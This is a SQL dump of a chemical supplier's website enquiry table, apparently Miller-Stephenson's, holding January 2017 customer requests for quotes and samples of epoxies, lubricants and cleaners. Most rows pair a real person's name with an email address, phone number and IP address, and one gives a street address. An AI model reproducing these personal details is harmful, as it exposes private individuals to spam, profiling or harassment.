INSERT INTO `wp_enquiry_detail_new` VALUES (366, 'jameshorne', 'jameshorne@eastman.com', 'Hello,\nI am with Eastman Chemical Company and we were interested in using your product (Heloxy Modifier 505). Could you email me the product number (part number) for this product so our procurement department can order this? Thank you.', '', 'Product Number - Heloxy Modifier 505', '108.171.131.187', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1270";s:5:"title";s:13:"HELOXY™ 505";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-03 14:10:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (367, 'Hongjun Liang', 'helen.ma@ttuhsc.edu', 'Hello,\nCould you send me a quote of the 2 Krytox items (listed below). Thank you.\nHongjun Liang\nAssociate Professor\nTexas Tech University\nLubbock, TX 79430\n\n1 of Krytox 157 FSL, in needle-nose bottle, 1 oz\n1 of Krytox 157 FSH, in needle-nose bottle, 1 oz\n', '(806) 743-1463', 'Quote', '66.230.10.189', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-03 15:48:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (368, 'Abdelkader Benhalima', 'abdelkader.benhalima@nrc-cnrc.gc.ca', 'Hello \nI would like quote for 1 gallon and with EPIKURE 3230 (1L)\nThanks for fast reply', '1 450-641-5148', 'Quote resquest', '132.246.233.168', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-03 18:19:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (369, 'Tate Stroud', 'Tstroud@drburtonhpi.com', 'I would love a sample to try in my injection molding shop to see if it reduces grease and dirt mark off', '(252) 228-7039', 'TM7 grease', '65.127.46.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1077";s:5:"title";s:3:"TM7";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:82:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-tm7-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-03 20:04:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (370, 'Kelly Buller', 'kbuller@iccontrols.com', 'Is the a replacement for P/N  DPMS-W1115A.\nIs MPQ 12 cans/case?', '(519) 941-8161', 'Pricing', '72.143.92.38', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:7:"MS-475C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-03 21:39:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (371, 'Bob Kelley', 'bobkat915@att.net', 'Price for 6 or 12 cans and cost of shipping', '(916) 715-3903', 'Order MS260', '76.216.167.127', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-04 00:31:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (372, 'Test Test', 'ddillulio@mschem.com', 'test', '', '', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"400";s:5:"title";s:21:"ReleaSys 82 (Aerosol)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-04 12:50:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (373, 'Kym Turner', 'kym.turner@attica.com', 'Can you let me have a price and delivery (OX29 6SW) on 2 x 20.4kgs canisters please.', '', 'Opteon Sion 20.4kgs', '82.68.2.94', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-04 14:19:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (374, 'TAMMY NOBLE', 'knitandsew44@yahoo.com', 'How do I go about to order Cleaner MS-260?\nThank you\nTammy\n', '(610) 513-6659', 'price', '73.188.224.81', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-04 17:09:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (375, 'Zayyan Chowdhury', 'zayyanc@gmail.com', 'Teststssent from phone', '', 'Testetstets', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1729";s:5:"title";s:15:"Penetrating Oil";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/penetrating-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-06 15:21:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (376, 'John ', 'Johnsemporium@yahoo.com', 'I am interested in trying your MS-153, I would be using it in lead casting. Please provide me with a price and application instructions. thanks John', '', 'MS-153', '50.151.200.110', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:6:"MS-153";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-06 15:44:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (377, 'Sherie Ruf', 'sruf@group8tech.com', 'Need price per can on MS-122AD.\n\nThanks\n\nSherie Ruf', '801379-0118', '', '45.56.60.211', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-06 17:46:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (378, 'Todd Kammerdiener', 'toddkammerdiener@msn.com', 'I need enough resin and harder to make 4 gallons.\nShips to 77346. ', '832527-4231', '', '70.196.82.94', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-07 03:02:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (379, 'Devendar Singh', 'devendar@globeaviation.in', 'Dear Sir/Madam,\n\nPlease provide the quote for Aero Duster MS-222N quantity 25\n\nThanks and Regards \nDevendar Singh', '+918828231362', 'RFQ', '182.70.58.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"25";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-07 11:42:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (380, 'Dan miller', 'Miller77@CHARTER.net', '77 lakeshore dr\nSpencer ma 01562', '', 'Sample inquiry', '68.191.248.245', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-07 20:24:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (381, 'Chris Fish', 'cnf500@gmail.com', 'We are needing a quaotation of price on the Epon SU8 product. \nWhat are the typical container sizes that MS offers?\nThank you,\nChris Fish\nJen-Tek, LLC./Fuzion Ind.', '541944-7056', 'Epon SU8', '71.11.72.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"952";s:5:"title";s:12:"EPON™ SU-8";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-SU-8.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-08 01:04:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (382, 'Chris Fish', 'cnf500@gmail.com', 'We are needing a quaotation of price on the Epon SU8 product. \nWhat are the typical container sizes that MS offers?\nThank you,\nChris Fish\nJen-Tek, LLC./Fuzion Ind.', '541944-7056', 'Epon SU8', '71.11.72.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"952";s:5:"title";s:12:"EPON™ SU-8";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-SU-8.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-08 01:04:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (383, 'Chris Fish', 'cnf500@gmail.com', 'We are needing a quotaion or price on the Epon 1163.\nalso what are the standard conatianer sizes that MS offers. \n\nAlso what hardener is suggested for this reisn.\nThank You,\nChris Fish\nJen-Tek, LLC / Fuzion Ind.', '541944-7056', 'Epon 1163', '71.11.72.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1019";s:5:"title";s:12:"EPON™ 1163";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-08 01:10:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (384, 'Elizabeth Wilkinson', 'elizabeth.c.wilkinson@gmail.com', 'Please quote for 1 pt,  and 1 qt sizes. Thank you.\n', '503422-1629', 'Room 828 quote.', '65.102.39.32', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-08 03:42:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (385, 'Rosdzaman', 'rosdzaman@dutaklasik.com.my', 'Dear Sir, \n\nWe would like to make an enquiry for spray type silicone conformal coating. \n\nPleaee quote us your best price and delivery lead time.', '+603-55258685', 'ENQUIRY SILICONE CONFORMAL COATING', '60.48.44.21', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-08 06:26:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (386, 'B Mattison', 'bymattison@yahoo.com', 'What is the price on the Epoxy 907 Adhesive System (2 small tubes) ??', '810577-4507', '907 Epoxy', '174.124.179.29', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-08 22:02:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (387, 'Hendri Liebenberg', 'hendrilieb@gmail.com', 'Hello I would like the  price of your product please \nAnd do you ship to British Columbia Canada ', '778230-9420', 'Conformal coating ', '70.68.211.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-09 00:23:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (388, 'Jeff Honeycutt', 'Jeff.Honeycutt@ElbitSystems-US.com', 'Please provide price and delivery for .5OZ tube (or smallest available size) Krytox 240AC', '256480-2314', 'Krytox 240AC', '76.195.112.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-09 16:07:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (389, 'Mark Hancock', 'mark.hancock@kaneyaerospace.com', 'We are quoting potential new business that requires this Release Agent ', '815986-4359', 'RFQ', '50.79.117.137', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"6";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-09 18:36:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (390, 'Majid Zia', 'majid.zia@xfinio.com', 'The base molds are aluminum or steel. ', '651621-2999', 'Release agents for Plastisol part manufacturing. ', '67.139.95.131', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"305";s:5:"title";s:8:"MS-143AX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143AX-.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-09 20:32:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (391, 'Mark Musgrove', 'mark.musgrove@cjmfgsolutions.com', 'Purchase', '480517-0233', 'Krtox 240AZ', '184.180.135.110', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-09 23:02:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (392, 'John', 'Johnsemporium@yahoo.com', 'I filled out this form Friday or Thursday and the message said I would be contacted in 3 hours, but I never was. I am interested in price and applicating instructions. it would be used on casting of  lead ', '', 'Ms-153', '50.151.200.110', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:6:"MS-153";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 01:07:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (393, 'Jun Zhang', 'zhang.jj.2@pg.com', 'Hello, I am based in SIngapore and looking to buy 10 or more of this MS222L aeroduster product.  Do you have this product available, and if so, what\'s the fastest you could ship it to Singapore?  \n\nPlease reply soon as possible.  Thank you.', '', 'Availability', '104.129.204.79', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2782";s:5:"title";s:27:"MS-222L Aero-Duster® Ultra";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_130437422.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 05:32:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (394, 'Tahir Mahmood', 'tahir.mehmood@piac.aero', 'Pakistan International Airlines would like to send an RFQ for Subject Part. \n\nKindly confirm price and availability of item \n\nRegards. \n\nTahir Mahmood', '+922199045494', 'MS-111 Epoxy Stripping Agent', '202.14.71.136', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 11:44:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (395, 'Christopher Zoto', 'christopher.a.zoto.ctr@mail.mil', 'Hi, \n\nI would like to please submit a request for a pricing and availability inquiry of Vertrel XF (cleaning agent), 1 quantity of 1 L. Thank you,\n\nKind regards,\nChris Zoto', '1508-233-5084', 'Product Inquiry for Vertrel XF', '131.92.144.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 15:55:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (396, 'PAM SARGENT', 'pamela.sargent@toraycfa.com', '4 gallons', '864520-4074', 'epon 828', '97.82.83.243', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 16:08:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (397, 'Clare Liotta', 'clare.liotta@intusurg.com', 'I would like a quote for a quart of 143TE-10 and -05. \n\nBest,\nClare Liotta', '408523-6402', '143TE-10,05', '204.27.197.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"305";s:5:"title";s:8:"MS-143AX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143AX-.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 17:43:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (398, 'Leonard Madoch', 'lmadoch@wsflab.com', 'Can you send me the updated Safety Data Sheet for this product.. (GPL 206).\n\nThanks.', '', 'SDS', '38.103.103.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 18:26:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (399, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'testestest', '', 'asda', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 20:14:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (400, 'sasha cai lesher-perez', 'sashacailp@g.ucla.edu', 'Hello, \nIf you could please send me the price for kryotox and ideally a quote. Can I purchase with a PO? \n\nThanks so much\nSasha Cai', '310794-2248', 'Jar of Kryotox Price and Price breaks', '128.97.3.185', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 22:11:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (401, 'José Fonseca', 'josearmandofonseca@sapo.pt', 'Good morning!\nI woud like to know if you can sent the gpl 106 oil (.5kg) to Portugal and how match does it cost.\n\nGreetings and thank you.\n ', '', 'Price of the oil!', '89.154.63.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"441";s:5:"title";s:7:"GPL 106";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease-pfpe.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-10 23:31:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (402, 'Brice Milstead', 'milsteadb@cmhservices.net', 'Hi, I am with CMH Services, a Crown and Unicarriers forklift dealer out of South Carolina. We are looking to stock a couple cases of Ms-555 to try out.\nThanks,\nBrice Milstead', '803695-0149', 'Pricing and availability for MS-555 ', '207.144.189.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-11 12:14:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (403, 'Don Ray Sharp', 'don.ray.sharp@gmail.com', 'Hello, we\'re exploring alternative urethane bases for an existing nanocomposite that we\'ve been working on for the past few years. I\'d like to order a sample or 1 batch for our edification.  Please let me know the price and lead time so that we can determine the viability of using your product. Thanks and regards.', '917974-5976', 'Request sample for in-house testing', '72.198.163.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"736";s:5:"title";s:7:"MS-472C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-11 19:16:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (404, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'testestestest', '', 'testestest', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"442";s:5:"title";s:7:"GPL 107";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-pfpe-oil-grease-gpl.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-12 21:08:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (405, 'Tomas Forsman', 'tomas@repipe.fi', 'Dear sirs, We are searching for bisfonol A free epoxy. Please offer your profuct suitsuketta for Sewer lining. Regards Tomas', '+358400602618', 'Sewer lining', '88.192.8.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"952";s:5:"title";s:12:"EPON™ SU-8";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-SU-8.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-01-12 22:06:25', '', NULL, '', '', '', NULL, '', ''); 
